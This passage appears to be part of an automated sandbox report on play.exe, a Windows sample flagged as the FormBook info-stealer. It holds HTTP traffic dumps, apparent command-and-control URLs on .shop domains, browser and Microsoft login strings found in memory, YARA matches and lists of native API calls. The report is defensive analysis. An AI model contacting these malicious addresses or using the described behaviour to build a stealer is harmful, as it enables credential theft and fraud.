65 b4 9c f9 ef 5a 71 95 29 bc 6a 89 41 6f 7c 06 6d 35 6b 61 02 27 85 c1 2c de 46 13 14 6b 36 78 3e 44 07 f8 41 0c df e9 62 55 1a 0e ce 2e ec f8 3e fc 79 1b f8 d5 1d 5e 2d da 52 db 04 a2 53 6f 36 42 29 6d cb d9 ce e9 16 38 fd b3 77 e5 d4 2a 6c 83 9c 6e 7d ec 77 f7 e9 ca 1c 91 2a d4 65 c5 09 c4 51 f4 fa b8 90 93 ba 3f bb e0 15 64 b9 83 c7 04 e2 43 b3 80 dd 76 d5 0b 6d b1 1d 73 95 76 8d 11 f7 04 0a 83 b7 31 d9 e0 2d 50 ba 45 c9 9a 6c 02 92 cc a5 b6 43 4c 18 5d da 40 33 d6 2e 01 89 96 b1 3d 3d e1 30 56 1c 30 35 09 c4 bb 05 f5 ad a1 92 40 d7 e5 c0 01 00 60 a6 91 1b 92 6f a7 c9 dd 77 a5 07 5d 15 31 e7 7f 5a a3 0c 9a 4f 2f ae 52 fa 56 ad 5a 33 5c db 4d f2 ac 34 8b a7 f7 3c 49 86 da 04 3e ee f7 fb c1 61 90 19 db c0 35 42 f6 cd 8b d7 d4 14 3a 39 3e b3 04 fc fa 37 de f1 78 1c 1c 8c 37 0e 7a 59 d7 82 1a 6d 31 98 54 dd ad 9b 58 10 f1 dc c1 70 03 0d 39 3d f4 4a e4 8e cc 85 71 e2 5a f0 62 e2 98 a9 4e 60 3f 09 e3 3d d4 7d 3d c1 26 fc 8f 36 cf 48 2e 4b dc fd 8b e2 36 67 a3 ed db 48 75 2a 7e 17 89 2f 7b b1 80 56 28 a9 15 43 09 96 2c ce 40 69 38 6d 56 1a 8e 1b 9f 76 93 df 2f 9d d2 57 90 46 38 97 f9 f3 58 fb fd 12 2e 43 dd b0 f8 e7 3f 00 00 00 ff ff 0d 0a Data Ascii: 1ed\|S0]sBs7iM@]-s`%7i4`$YGGRA{Pqm/pxiB_</J9/\\|!+jZAeZq)jAo\|m5ka',Fk6x>DAbU.>y^-RSo6B)m8wln}weQ?dCvmsv1-PElCL]@3.==0V05@`ow]1ZO/RVZ3\M4<I>a5B:9>7x7zYm1TXp9=JqZbN`?=}=&6H.K6gHu*~/{V(C,@i8mVv/WF8X.C?
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 31 Aug 2024 12:07:03 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IYAriX6xP8gM%2FYPvnfRxxxNcjpOVRrattKGMXPfM850NrWPTBUECdQcHYnLHZBY5DGLMiPFzuTfRB6xHTcsK9HHMpZWw%2BBICfLMcAO%2B6ldSte92yf62BkMOb6hOADfN05p%2BUu%2BsSasE%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bbce5e78bed187d-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 31 65 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7c 53 cb b2 9b 30 0c 5d 73 bf 42 a5 73 37 69 09 90 a4 4d 87 40 96 5d f6 1f 8c 2d c0 73 8d c5 60 25 37 69 a7 ff de e1 19 e8 34 dd 60 24 59 c7 47 47 52 fa 41 91 e4 7b 83 50 71 6d ce 2f e9 70 78 69 85 42 9d 5f 3c 2f ad 91 05 c8 4a b4 0e 39 f3 2f 5c 04 df 7c 08 1f 21 2b 6a cc fc ab c6 f7 86 5a f6 41 92 65 b4 9c f9 ef 5a 71 95 29 bc 6a 89 41 6f 7c 06 6d 35 6b 61 02 27 85 c1 2c de 46 13 14 6b 36 78 3e 44 07 f8 41 0c df e9 62 55 1a 0e ce 2e ec f8 3e fc 79 1b f8 d5 1d 5e 2d da 52 db 04 a2 53 6f 36 42 29 6d cb d9 ce e9 16 38 fd b3 77 e5 d4 2a 6c 83 9c 6e 7d ec 77 f7 e9 ca 1c 91 2a d4 65 c5 09 c4 51 f4 fa b8 90 93 ba 3f bb e0 15 64 b9 83 c7 04 e2 43 b3 80 dd 76 d5 0b 6d b1 1d 73 95 76 8d 11 f7 04 0a 83 b7 31 d9 e0 2d 50 ba 45 c9 9a 6c 02 92 cc a5 b6 43 4c 18 5d da 40 33 d6 2e 01 89 96 b1 3d 3d e1 30 56 1c 30 35 09 c4 bb 05 f5 ad a1 92 40 d7 e5 c0 01 00 60 a6 91 1b 92 6f a7 c9 dd 77 a5 07 5d 15 31 e7 7f 5a a3 0c 9a 4f 2f ae 52 fa 56 ad 5a 33 5c db 4d f2 ac 34 8b a7 f7 3c 49 86 da 04 3e ee f7 fb c1 61 90 19 db c0 35 42 f6 cd 8b d7 d4 14 3a 39 3e b3 04 fc fa 37 de f1 78 1c 1c 8c 37 0e 7a 59 d7 82 1a 6d 31 98 54 dd ad 9b 58 10 f1 dc c1 70 03 0d 39 3d f4 4a e4 8e cc 85 71 e2 5a f0 62 e2 98 a9 4e 60 3f 09 e3 3d d4 7d 3d c1 26 fc 8f 36 cf 48 2e 4b dc fd 8b e2 36 67 a3 ed db 48 75 2a 7e 17 89 2f 7b b1 80 56 28 a9 15 43 09 96 2c ce 40 69 38 6d 56 1a 8e 1b 9f 76 93 df 2f 9d d2 57 90 46 38 97 f9 f3 58 fb fd 12 2e 43 dd b0 f8 e7 3f 00 00 00 ff ff 0d 0a Data Ascii: 1ed\|S0]sBs7iM@]-s`%7i4`$YGGRA{Pqm/pxiB_</J9/\\|!+jZAeZq)jAo\|m5ka',Fk6x>DAbU.>y^-RSo6B)m8wln}weQ?dCvmsv1-PElCL]@3.==0V05@`ow]1ZO/RVZ3\M4<I>a5B:9>7x7zYm1TXp9=JqZbN`?=}=&6H.K6gHu*~/{V(C,@i8mVv/WF8X.C?

Source: relog.exe, 00000005.00000002.4105196845.0000000004D6A000.00000004.10000000.00040000.00000000.sdmp, aAqvujXSGNo.exe, 00000006.00000002.4104603679.000000000438A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.thinkphp.cn
Source: aAqvujXSGNo.exe, 00000006.00000002.4106256857.0000000005347000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.x0x9x8x8x7x6.shop
Source: aAqvujXSGNo.exe, 00000006.00000002.4106256857.0000000005347000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.x0x9x8x8x7x6.shop/ps9q/
Source: relog.exe, 00000005.00000002.4107100225.0000000007A68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: relog.exe, 00000005.00000002.4107100225.0000000007A68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: relog.exe, 00000005.00000002.4107100225.0000000007A68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: relog.exe, 00000005.00000002.4107100225.0000000007A68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: relog.exe, 00000005.00000002.4107100225.0000000007A68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: relog.exe, 00000005.00000002.4107100225.0000000007A68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: relog.exe, 00000005.00000002.4107100225.0000000007A68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: relog.exe, 00000005.00000002.4103860914.0000000002D07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: relog.exe, 00000005.00000002.4103860914.0000000002D07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: relog.exe, 00000005.00000002.4103860914.0000000002D07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: relog.exe, 00000005.00000002.4103860914.0000000002CE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033Z9
Source: relog.exe, 00000005.00000002.4103860914.0000000002CE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: relog.exe, 00000005.00000003.2240887847.0000000007A04000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: relog.exe, 00000005.00000002.4107100225.0000000007A68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: relog.exe, 00000005.00000002.4105196845.0000000003C24000.00000004.10000000.00040000.00000000.sdmp, aAqvujXSGNo.exe, 00000006.00000002.4104603679.0000000003244000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2354562437.0000000033C54000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: relog.exe, 00000005.00000002.4107100225.0000000007A68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: relog.exe, 00000005.00000002.4105196845.0000000004A46000.00000004.10000000.00040000.00000000.sdmp, aAqvujXSGNo.exe, 00000006.00000002.4104603679.0000000004066000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.hugedomains.com/domain_profile.cfm?d=rantup.com
Source: relog.exe, 00000005.00000002.4105196845.000000000508E000.00000004.10000000.00040000.00000000.sdmp, aAqvujXSGNo.exe, 00000006.00000002.4104603679.00000000046AE000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.kiristyle.shop/vod9/?ZXzt1jdX=ivZzxM4Jfmd0ai63Imd0RTeSPfjP5G

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 0.2.play.exe.ba0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.4104437316.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4104395231.0000000002F70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2062479461.0000000003520000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4106256857.0000000005290000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4103634894.00000000008B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2062031623.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2061972326.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4104462118.0000000003910000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.play.exe.ba0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.4104437316.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.4104395231.0000000002F70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.2062479461.0000000003520000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.4106256857.0000000005290000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.4103634894.00000000008B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.2062031623.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.2061972326.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.4104462118.0000000003910000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Contains functionality to call native functions

Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BCD283 NtClose,	0_2_00BCD283
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BA1C00 EntryPoint,NtProtectVirtualMemory,	0_2_00BA1C00
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2B60 NtClose,LdrInitializeThunk,	0_2_026D2B60
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2C70 NtFreeVirtualMemory,LdrInitializeThunk,	0_2_026D2C70
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2DF0 NtQuerySystemInformation,LdrInitializeThunk,	0_2_026D2DF0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D35C0 NtCreateMutant,LdrInitializeThunk,	0_2_026D35C0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D4340 NtSetContextThread,	0_2_026D4340
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D4650 NtSuspendThread,	0_2_026D4650
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2AF0 NtWriteFile,	0_2_026D2AF0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2AD0 NtReadFile,	0_2_026D2AD0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2AB0 NtWaitForSingleObject,	0_2_026D2AB0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2BE0 NtQueryValueKey,	0_2_026D2BE0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2BF0 NtAllocateVirtualMemory,	0_2_026D2BF0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2BA0 NtEnumerateValueKey,	0_2_026D2BA0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2B80 NtQueryInformationFile,	0_2_026D2B80
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2E30 NtWriteVirtualMemory,	0_2_026D2E30
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2EE0 NtQueueApcThread,	0_2_026D2EE0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2EA0 NtAdjustPrivilegesToken,	0_2_026D2EA0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2E80 NtReadVirtualMemory,	0_2_026D2E80
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2F60 NtCreateProcessEx,	0_2_026D2F60
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2F30 NtCreateSection,	0_2_026D2F30
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2FE0 NtCreateFile,	0_2_026D2FE0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2FA0 NtQuerySection,	0_2_026D2FA0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2FB0 NtResumeThread,	0_2_026D2FB0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2F90 NtProtectVirtualMemory,	0_2_026D2F90
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2C60 NtCreateKey,	0_2_026D2C60
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2C00 NtQueryInformationProcess,	0_2_026D2C00
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2CF0 NtOpenProcess,	0_2_026D2CF0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2CC0 NtQueryVirtualMemory,	0_2_026D2CC0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2CA0 NtQueryInformationToken,	0_2_026D2CA0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2D30 NtUnmapViewOfSection,	0_2_026D2D30
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2D00 NtSetInformationFile,	0_2_026D2D00
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2D10 NtMapViewOfSection,	0_2_026D2D10
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2DD0 NtDelayExecution,	0_2_026D2DD0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2DB0 NtEnumerateKey,	0_2_026D2DB0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D3010 NtOpenDirectoryObject,	0_2_026D3010
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D3090 NtSetValueKey,	0_2_026D3090
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D39B0 NtGetContextThread,	0_2_026D39B0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D3D70 NtOpenThread,	0_2_026D3D70
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D3D10 NtOpenProcessToken,	0_2_026D3D10
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03284340 NtSetContextThread,LdrInitializeThunk,	5_2_03284340
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03284650 NtSuspendThread,LdrInitializeThunk,	5_2_03284650
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282B60 NtClose,LdrInitializeThunk,	5_2_03282B60
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282BA0 NtEnumerateValueKey,LdrInitializeThunk,	5_2_03282BA0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282BE0 NtQueryValueKey,LdrInitializeThunk,	5_2_03282BE0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	5_2_03282BF0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282AF0 NtWriteFile,LdrInitializeThunk,	5_2_03282AF0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282AD0 NtReadFile,LdrInitializeThunk,	5_2_03282AD0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282F30 NtCreateSection,LdrInitializeThunk,	5_2_03282F30
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282FB0 NtResumeThread,LdrInitializeThunk,	5_2_03282FB0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282FE0 NtCreateFile,LdrInitializeThunk,	5_2_03282FE0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282E80 NtReadVirtualMemory,LdrInitializeThunk,	5_2_03282E80
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282EE0 NtQueueApcThread,LdrInitializeThunk,	5_2_03282EE0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282D30 NtUnmapViewOfSection,LdrInitializeThunk,	5_2_03282D30
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282D10 NtMapViewOfSection,LdrInitializeThunk,	5_2_03282D10
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282DF0 NtQuerySystemInformation,LdrInitializeThunk,	5_2_03282DF0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282DD0 NtDelayExecution,LdrInitializeThunk,	5_2_03282DD0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282C60 NtCreateKey,LdrInitializeThunk,	5_2_03282C60
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282C70 NtFreeVirtualMemory,LdrInitializeThunk,	5_2_03282C70
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282CA0 NtQueryInformationToken,LdrInitializeThunk,	5_2_03282CA0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032835C0 NtCreateMutant,LdrInitializeThunk,	5_2_032835C0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032839B0 NtGetContextThread,LdrInitializeThunk,	5_2_032839B0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282B80 NtQueryInformationFile,	5_2_03282B80
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282AB0 NtWaitForSingleObject,	5_2_03282AB0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282F60 NtCreateProcessEx,	5_2_03282F60
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282FA0 NtQuerySection,	5_2_03282FA0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282F90 NtProtectVirtualMemory,	5_2_03282F90
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282E30 NtWriteVirtualMemory,	5_2_03282E30
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282EA0 NtAdjustPrivilegesToken,	5_2_03282EA0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282D00 NtSetInformationFile,	5_2_03282D00
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282DB0 NtEnumerateKey,	5_2_03282DB0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282C00 NtQueryInformationProcess,	5_2_03282C00
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282CF0 NtOpenProcess,	5_2_03282CF0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282CC0 NtQueryVirtualMemory,	5_2_03282CC0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03283010 NtOpenDirectoryObject,	5_2_03283010
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03283090 NtSetValueKey,	5_2_03283090
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03283D10 NtOpenProcessToken,	5_2_03283D10
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03283D70 NtOpenThread,	5_2_03283D70
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_008D9200 NtCreateFile,	5_2_008D9200
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_008D9370 NtReadFile,	5_2_008D9370
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_008D9470 NtDeleteFile,	5_2_008D9470
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_008D9510 NtClose,	5_2_008D9510
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_008D9680 NtAllocateVirtualMemory,	5_2_008D9680
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0310F197 NtQueryInformationProcess,	5_2_0310F197

Detected potential crypto function

Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BB91E3	0_2_00BB91E3
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BA1990	0_2_00BA1990
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BA31D0	0_2_00BA31D0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BCF933	0_2_00BCF933
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BA3AF0	0_2_00BA3AF0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BB0A3A	0_2_00BB0A3A
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BB0A43	0_2_00BB0A43
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BB73C3	0_2_00BB73C3
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BAECE3	0_2_00BAECE3
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BA1C00	0_2_00BA1C00
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BB0C63	0_2_00BB0C63
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BA35B0	0_2_00BA35B0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BA35A7	0_2_00BA35A7
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BA2DD0	0_2_00BA2DD0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BA2DC8	0_2_00BA2DC8
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02740274	0_2_02740274
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027202C0	0_2_027202C0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0275A352	0_2_0275A352
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027603E6	0_2_027603E6
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026AE3F0	0_2_026AE3F0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02732000	0_2_02732000
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02728158	0_2_02728158
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02690100	0_2_02690100
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273A118	0_2_0273A118
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027581CC	0_2_027581CC
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027541A2	0_2_027541A2
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027601AA	0_2_027601AA
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BC6E0	0_2_026BC6E0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0770	0_2_026A0770
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C4750	0_2_026C4750
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269C7C0	0_2_0269C7C0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02752446	0_2_02752446
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02744420	0_2_02744420
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0274E4F6	0_2_0274E4F6
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0535	0_2_026A0535
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02760591	0_2_02760591
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269EA80	0_2_0269EA80
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0275AB40	0_2_0275AB40
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02756BD7	0_2_02756BD7
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A2840	0_2_026A2840
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026AA840	0_2_026AA840
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CE8F0	0_2_026CE8F0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026868B8	0_2_026868B8
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B6962	0_2_026B6962
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A29A0	0_2_026A29A0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0276A9A6	0_2_0276A9A6
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0E59	0_2_026A0E59
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0275EE26	0_2_0275EE26
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0275EEDB	0_2_0275EEDB
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0275CE93	0_2_0275CE93
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B2E90	0_2_026B2E90
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02714F40	0_2_02714F40
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02742F30	0_2_02742F30
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026E2F28	0_2_026E2F28
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C0F30	0_2_026C0F30
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02692FC8	0_2_02692FC8
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0271EFA0	0_2_0271EFA0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0C00	0_2_026A0C00
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02690CF2	0_2_02690CF2
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02740CB5	0_2_02740CB5
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026AAD00	0_2_026AAD00
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273CD1F	0_2_0273CD1F
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269ADE0	0_2_0269ADE0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B8DBF	0_2_026B8DBF
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027412ED	0_2_027412ED
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BD2F0	0_2_026BD2F0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BB2C0	0_2_026BB2C0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A52A0	0_2_026A52A0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0268D34C	0_2_0268D34C
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0275132D	0_2_0275132D
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026E739A	0_2_026E739A
